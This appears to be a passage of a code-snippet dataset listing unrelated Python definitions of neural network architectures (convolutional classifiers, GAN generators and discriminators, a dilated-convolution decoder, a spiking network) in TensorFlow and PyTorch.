padding='SAME', name='conv3')\n norm3 = lrn(conv3, 2, 1e-04, 0.75, name='norm3')\n # Apply relu function\n relu3 = tf.nn.relu(norm3)\n\n # 4st Layer: Conv -> norm -> ReLu\n conv4 = self.conv(x=relu3, stride_y=1, stride_x=1, padding='SAME', name='conv4')\n norm4 = lrn(conv4, 2, 1e-04, 0.75, name='norm4')\n # Apply relu function\n relu4 = tf.nn.relu(norm4)\n\n pool4 = tf.nn.max_pool(relu4, ksize=[1, 3, 3, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # 5st Layer: Conv -> norm -> ReLu\n conv5 = self.conv(x=pool4, stride_y=1, stride_x=1, padding='SAME', name='conv5')\n norm5 = lrn(conv5, 2, 1e-04, 0.75, name='norm5')\n # Apply relu function\n relu5 = tf.nn.relu(norm5)\n\n # 6st Layer: Conv -> norm -> ReLu\n conv6 = self.conv(x=relu5, stride_y=1, stride_x=1, padding='SAME', name='conv6')\n norm6 = lrn(conv6, 2, 1e-04, 0.75, name='norm6')\n # Apply relu function\n relu6 = tf.nn.relu(norm6)\n\n pool6 = tf.nn.avg_pool(relu6, ksize=[1, 4, 4, 1],\n strides=[1, 4, 4, 1],\n padding='SAME')\n\n flattened = tf.reshape(pool6, [-1, 128 * 4])\n self.fc7 = self.fc(flattened, name='fc7')", "def __init__(self, n_filters, n_units_hidden):\n super(MNISTNet, self).__init__()\n self.conv = nn.Conv2d(1, n_filters, kernel_size=3)\n self.pool = nn.MaxPool2d(2)\n self.fc1 = nn.Linear(n_filters * 13 * 13, n_units_hidden)\n self.fc2 = nn.Linear(n_units_hidden, 10)", "def example():\n base_path = Path(TMPDIR)\n\n discriminator = Model(num_input=28 * 28)\n discriminator.add(Layer(512, activation=af.RELU))\n discriminator.add(Layer(1, activation=af.SIGMOID))\n\n generator_discriminator = Model(num_input=100)\n generator_discriminator.add(Layer(512, activation=af.LEAKY_RELU))\n generator_discriminator.add(Layer(28 * 28, activation=af.SIGMOID))\n generator_discriminator.add(Layer(512, activation=af.RELU)) # Needs to match discriminator\n generator_discriminator.add(Layer(1, activation=af.SIGMOID)) # Needs to match discriminator\n\n nn_discriminator = NeuralNetwork(discriminator, learning_rate=0.0002, cost_function=cf.CROSS_ENTROPY,\n\n optimizer=opt.ADAM,\n optimizer_settings=AdamOptimizer(beta1=0.5, beta2=0.999, epsilon=1e-8),\n batch_size=32)\n\n discriminator_weight_path = Path(DISCRIMINATOR_WEIGHTS_FILE_PATH)\n if discriminator_weight_path.exists():\n log.info(\"Discriminator weight file detected. Loading.\")\n nn_discriminator.load(discriminator_weight_path)\n\n nn_generator_discriminator = NeuralNetwork(generator_discriminator,\n use_layer_from=[{\"model\": nn_discriminator,\n \"layer_map\": [{\"from\": 1, \"to\": 3},\n {\"from\": 2, \"to\": 4}]}],\n\n learning_rate=0.0002, cost_function=cf.CROSS_ENTROPY, # Slower than D\n optimizer=opt.ADAM,\n optimizer_settings=AdamOptimizer(beta1=0.5, beta2=0.999, epsilon=1e-8),\n batch_size=32,\n weight_parameter=wparam(init_type=wparam.NORMAL, stddev=0.02))\n\n generator_weight_path = Path(GENERATOR_WEIGHTS_FILE_PATH)\n if generator_weight_path.exists():\n log.info(\"Generator weight file detected. Loading.\")\n nn_generator_discriminator.load(generator_weight_path)\n\n noise = np.random.normal(size=(NUM_IMAGES_TO_GENERATE, 100))\n\n print(\"Generating...\")\n test_images = nn_generator_discriminator.predict_intermediate(noise, 2)\n\n for p in range(test_images.shape[0]):\n img = test_images[p].reshape((28, 28)).copy()\n img *= 255.0\n img_pil = Image.fromarray(np.uint8(img))\n image_path = base_path / Path(\"%d.jpg\" % (p))\n img_pil.save(image_path)", "def compile(self):\n m, n = self.input_shape[1], self.input_shape[2]\n\n inp = Input(shape=self.input_shape, traces=True)\n self.add_layer(inp, \"DoG\")\n\n s1 = LIFNodes(shape=(18, m, n), traces=True)\n self.add_layer(s1, \"conv_1\")\n c1 = LIFNodes(shape=(18, m // 2, n // 2), traces=True)\n self.add_layer(c1, \"pool_1\")\n\n s2 = LIFNodes(shape=(24, m // 2, n // 2), traces=True)\n self.add_layer(s2, \"conv_2\")\n c2 = LIFNodes(shape=(24, m // 4, n // 4), traces=True)\n self.add_layer(c2, \"pool_2\")\n\n s3 = LIFNodes(shape=(32, m // 4, n // 4), traces=True)\n self.add_layer(s3, \"conv_3\")\n f = LIFNodes(shape=(32, 1), traces=True)\n self.add_layer(f, \"global_pool\")\n\n conv1 = Conv2dConnection(inp, s1, 5, padding=2, weight_decay=0.01,\n nu=0.01, update_rule=PostPre, decay=0.5)\n self.add_connection(conv1, \"DoG\", \"conv_1\")\n pool1 = MaxPool2dConnection(s1, c1, 2, 2, decay=0.5)\n self.add_connection(pool1, \"conv_1\", \"pool_1\")\n\n conv2 = Conv2dConnection(c1, s2, 3, padding=1, weight_decay=0.01,\n nu=0.01, update_rule=PostPre, decay=0.5)\n self.add_connection(conv2, \"pool_1\", \"conv_2\")\n pool2 = MaxPool2dConnection(s2, c2, 2, 2, decay=0.5)\n self.add_connection(pool2, \"conv_2\", \"pool_2\")\n\n conv3 = Conv2dConnection(c2, s3, 3, padding=1, weight_decay=0.01,\n nu=0.01, update_rule=PostPre, decay=0.5)\n self.add_connection(conv3, \"pool_2\", \"conv_3\")\n global_pool = MaxPool2dConnection(s3, f, (m // 4, n // 4), decay=0.5)\n self.add_connection(global_pool, \"conv_3\", \"global_pool\")\n\n monitor = NetworkMonitor(self, layers=[\"DoG\", \"conv_1\", \"pool_1\",\n \"conv_2\", \"pool_2\",\n \"conv_3\", \"global_pool\"],\n connections=[(\"DoG\", \"conv_1\"),\n (\"pool_1\", \"conv_2\"),\n (\"pool_2\", \"conv_3\")],\n state_vars=[\"w\", \"s\"])\n self.add_monitor(monitor, \"network_monitor\")\n\n return self", "def __init__(self):\n\n super(ConvModule, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=64, kernel_size=5, stride=[1, 2])\n self.conv1_bn = nn.BatchNorm2d(64)\n self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=5, stride=[1, 2])\n self.conv2_bn = nn.BatchNorm2d(128)\n self.pool1 = nn.MaxPool2d(kernel_size=4, stride=2)\n self.dropout0 = nn.Dropout(p=0.4)\n\n self.conv3 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=[1, 2])\n self.conv3_bn = nn.BatchNorm2d(256)\n self.conv4 = nn.Conv2d(in_channels=256, out_channels=64, kernel_size=3, stride=[1, 2])\n self.conv4_bn = nn.BatchNorm2d(64)\n self.pool2 = nn.MaxPool2d(kernel_size=4, stride=2)\n #\n # self.conv5 = nn.Conv2d(in_channels=128, out_channels=64, kernel_size=3, stride=[1, 2])\n # self.conv5_bn = nn.BatchNorm2d(64)\n # self.pool3 = nn.MaxPool2d(kernel_size=3, stride=[1, 2])", "def __init__(self,\n image_channels,\n num_classes,\n kernel_size,\n padding,\n n_filters):\n super().__init__()\n\n self.num_classes = num_classes\n \n # new parameters\n self.kernel_size = kernel_size\n self.padding = padding\n self.n_filters = n_filters\n \n\n # Define the convolutional layers\n self.feature_extractor = nn.Sequential(\n nn.Conv2d(in_channels=image_channels, out_channels=self.n_filters[0], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[0]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[0], out_channels=self.n_filters[1], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[1]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[1], out_channels=self.n_filters[2], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[2]),\n nn.Conv2d(in_channels=self.n_filters[2], out_channels=self.n_filters[3], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[3]),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n \n # the feature_extractor outputs [num_classes, 128, 4, 4]\n self.num_output_features = self.n_filters[3]*4*4\n \n # Define the fully-connected layers\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(self.num_output_features, 64),\n nn.ReLU(inplace=True),\n nn.BatchNorm1d(num_features=64),\n nn.Dropout(),\n nn.Linear(64, 10)\n )", "def __init__(self,\n image_channels,\n num_classes,\n kernel_size,\n padding,\n n_filters):\n super().__init__()\n\n self.num_classes = num_classes\n \n # new parameters\n self.kernel_size = kernel_size\n self.padding = padding\n self.n_filters = n_filters\n \n\n # Define the convolutional layers\n self.feature_extractor = nn.Sequential(\n nn.Conv2d(in_channels=image_channels, out_channels=self.n_filters[0], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[0]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[0], out_channels=self.n_filters[1], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[1]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[1], out_channels=self.n_filters[2], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[2]),\n nn.Conv2d(in_channels=self.n_filters[2], out_channels=self.n_filters[3], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[3]),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n \n # the feature_extractor outputs [num_classes, 128, 4, 4]\n self.num_output_features = self.n_filters[3]*4*4\n \n # Define the fully-connected layers\n self.classifier = nn.Sequential(\n nn.Linear(self.num_output_features, 64),\n nn.ReLU(inplace=True),\n nn.BatchNorm1d(num_features=64),\n nn.Linear(64, 10)\n )", "def __init__(self, num_gpus):\n\n super(Generator, self).__init__()\n n_in = Z\n n_out = IMG_CHANNELS\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is latent variable space Z\n nn.ConvTranspose2d(n_in, feature_map * 8, kernel_size, 1, 0, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 4\n nn.ConvTranspose2d(feature_map * 8, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 2\n nn.ConvTranspose2d(feature_map * 4, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map\n nn.ConvTranspose2d(feature_map * 2, feature_map, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map),\n nn.ReLU(inplace=True),\n\n # nodes = output image size\n nn.ConvTranspose2d(feature_map, n_out, kernel_size, stride, padding, bias=bias),\n nn.Tanh()\n )", "def __init__(self):\n super(Decoder_1m, self).__init__()\n self.lconvtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Dropout(p=0.1),\n nn.Conv2d(128, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n ]\n )\n\n self.convtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n ]\n )\n self.final = nn.Sequential(\n nn.Conv2d(64, 5, kernel_size=(1, 1), padding=0),\n nn.BatchNorm2d(5),\n nn.ReLU(inplace=True),\n nn.Conv2d(5, 1, kernel_size=(1, 1), padding=0),\n )", "def __init__(self, num_gpus):\n\n super(Discriminator, self).__init__()\n n_in = IMG_CHANNELS\n n_out = 1\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is image\n nn.Conv2d(n_in, feature_map, kernel_size, stride, padding, bias=bias),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 2\n nn.Conv2d(feature_map, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 4\n nn.Conv2d(feature_map * 2, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 8\n nn.Conv2d(feature_map * 4, feature_map * 8, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = 1\n nn.Conv2d(feature_map * 8, n_out, kernel_size, 1, 0, bias=bias),\n nn.Sigmoid()\n )", "def __init__(self, n_classes=1, n_channel=3):\n\n super(InstanceSegNet, self).__init__()\n\n self.conv1 = nn.Conv1d(n_channel, 64, 1)\n self.conv2 = nn.Conv1d(64, 64, 1)\n self.conv3 = nn.Conv1d(64, 64, 1)\n self.conv4 = nn.Conv1d(64, 128, 1)\n self.conv5 = nn.Conv1d(128, 1024, 1)\n\n self.conv6 = nn.Conv1d(1088 + n_classes, 512, 1) # shape: (1024+64, 512, 1)\n self.conv7 = nn.Conv1d(512, 256, 1)\n self.conv8 = nn.Conv1d(256, 128, 1)\n self.conv9 = nn.Conv1d(128, 128, 1)\n self.conv10 = nn.Conv1d(128, 2, 1)\n\n self.dropout = nn.Dropout(p=0.5)\n\n self.bn1 = nn.BatchNorm1d(64)\n self.bn1 = nn.BatchNorm1d(64)\n self.bn2 = nn.BatchNorm1d(64)\n self.bn3 = nn.BatchNorm1d(64)\n self.bn4 = nn.BatchNorm1d(128)\n self.bn5 = nn.BatchNorm1d(1024)\n self.bn6 = nn.BatchNorm1d(512)\n self.bn7 = nn.BatchNorm1d(256)\n self.bn8 = nn.BatchNorm1d(128)\n self.bn9 = nn.BatchNorm1d(128)", "def __init__(self):\n\n super(LocalDiscriminator, self).__init__()\n\n # input image will have the size of 128x128x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=64, out_channels=128, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=128, out_channels=32, kernel_size=5)\n self.fifth_conv_layer = TransitionDown(in_channels=32, out_channels=1, kernel_size=5)\n \n '''\n self.fc1 = nn.Linear(4 * 4 * 512, 10)\n self.fc2 = nn.Linear(10, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)\n torch.nn.init.xavier_uniform(self.fc2.weight)\n '''", "def cnnModel3(features, labels, mode):\n \n dconv = True\n sz = 50\n n_dimensions = 13\n #n_dimensions = int(features[\"x\"].get_shape().as_list()[1]/(sz**2))\n print(\"MODE=%s\\nInput Dimensions=%s\"%(mode,n_dimensions))\n ks1 = [10,10]\n ks2 = [10,10]\n ks3 = [10,10]\n fs1 = 32\n fs2 = 64\n fs3 = 2\n \n # Input Layer\n input_layer = tf.reshape(features[\"x\"], [-1, sz, sz, n_dimensions])\n \n dropOut_layer = tf.layers.dropout(input_layer,rate=0.5)\n \n #print(input_layer.shape)\n \n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(\n inputs=dropOut_layer,\n filters=fs1,\n kernel_size=ks1,\n padding=\"same\",\n activation=tf.nn.leaky_relu,\n name=\"conv1\")\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n # Convolutional Layer #2 and Pooling Layer #2\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=fs2,\n kernel_size=ks2,\n padding=\"same\",\n activation=tf.nn.leaky_relu,\n name=\"conv2\")\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n \n pool2flat = tf.reshape(pool2,[-1,pool2.shape[1]*pool2.shape[2]*pool2.shape[3]])\n \n if dconv:\n dense1 = tf.layers.dense(inputs=pool2flat, units=int(sz*sz*2), activation=tf.nn.leaky_relu)\n dense1_rs = tf.reshape(dense1,[-1,sz,sz,2])\n dconv1 = tf.layers.conv2d_transpose(\n inputs=dense1_rs,filters=fs3,\n kernel_size=ks3,\n padding=\"same\",\n activation=tf.nn.leaky_relu,\n name=\"dconv1\")\n dconv1flat = tf.reshape(dconv1,[-1,dconv1.shape[1]*dconv1.shape[2]*dconv1.shape[3]])\n denseOut = tf.layers.dense(inputs=dconv1flat, units=int(sz*sz*2), activation=tf.nn.tanh)\n print(\"Input Layer Dimensions:\\t\",input_layer.shape)\n print(\"Dropout Layer Dimensions:\\t\",dropOut_layer.shape)\n print(\"First Conv Layer Dim:\\t\",conv1.shape)\n print(\"First Pool Layer Dim:\\t\",pool1.shape)\n print(\"Second Conv Layer Dim:\\t\", conv2.shape)\n print(\"Second Pool Layer Dim:\\t\", pool2.shape)\n print(\"Classify Layer Dim:\\t\", dense1.shape)\n print(\"Deconv Layer Dim:\\t\", dconv1.shape)\n print(\"Output Layer Dim:\\t\",denseOut.shape)\n else:\n denseOut = tf.layers.dense(inputs=pool2flat, units=int(sz*sz*2), activation=tf.nn.tanh)\n \n logits = tf.reshape(denseOut,[-1,int(sz*sz*2)])\n predicted_classes = tf.argmax(input=tf.reshape(dense1,[-1,int(sz*sz),2]), axis=2)\n \n if mode == tf.estimator.ModeKeys.PREDICT:\n predictions = {\n 'class_ids': predicted_classes,#[:, tf.newaxis],\n 'probabilities': tf.nn.softmax(logits),\n 'logits': logits,\n }\n return tf.estimator.EstimatorSpec(mode, predictions=predictions)\n \n loss = tf.reduce_sum(abs(tf.cast(labels,tf.float32)-tf.cast(logits,tf.float32))**2)**0.5\n\n label_rs = tf.reshape(labels,[-1,int(sz*sz),2])\n label_classes = tf.argmax(input=label_rs,axis=2)\n accuracy = tf.metrics.accuracy(labels=label_classes,predictions=predicted_classes,name='acc_op')\n metrics = {'accuracy': accuracy}\n tf.summary.scalar('accuracy', accuracy[1])\n\n if mode == tf.estimator.ModeKeys.EVAL:\n return tf.estimator.EstimatorSpec(mode,loss=loss,eval_metric_ops=metrics)\n \n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=10**-4)\n train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)", "def forward(self, x): \n # Layer 1\n x = F.elu(self.conv1(x)) # bsize x l1_channels x 1 x Nsamples\n x = self.batchnorm1(x)\n x = F.dropout(x, 0.25)\n x = x.permute(0, 2, 1, 3) # bsize x 1 x l1_channels x Nsamples\n\n # Layer 2\n x = self.padding1(x)\n x = F.elu(self.conv2(x)) # bsize x l2_channels x l1_channels x Nsamples\n x = self.batchnorm2(x) \n x = F.dropout(x, 0.25)\n x = self.pooling2(x) # bsize x l2_channels x floor(l1_channels/2) x floor(Nsamples/4)\n\n # Layer 3\n x = self.padding2(x)\n x = 